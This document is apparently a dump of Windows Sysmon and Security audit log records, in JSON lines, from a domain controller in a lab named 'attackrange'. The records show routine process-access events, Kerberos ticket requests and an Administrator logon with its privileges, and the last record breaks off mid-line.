{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4729,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4730,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A36F0600}\r\nSourceProcessId: 1492\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010B3720600}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A36F0600}","SourceProcessId":"1492","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010B3720600}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4731,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.630\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.630","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220457,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220458,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{8E2B88AF-627C-DE1E-E19E-166FF563264F}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{8E2B88AF-627C-DE1E-E19E-166FF563264F}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220459,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{8E2B88AF-627C-DE1E-E19E-166FF563264F}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{8E2B88AF-627C-DE1E-E19E-166FF563264F}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220460,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x673FC\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{8E2B88AF-627C-DE1E-E19E-166FF563264F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x673fc","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{8E2B88AF-627C-DE1E-E19E-166FF563264F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220461,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x673FC\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x673fc","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4732,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.630\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.630","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4733,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.630\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.630","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C: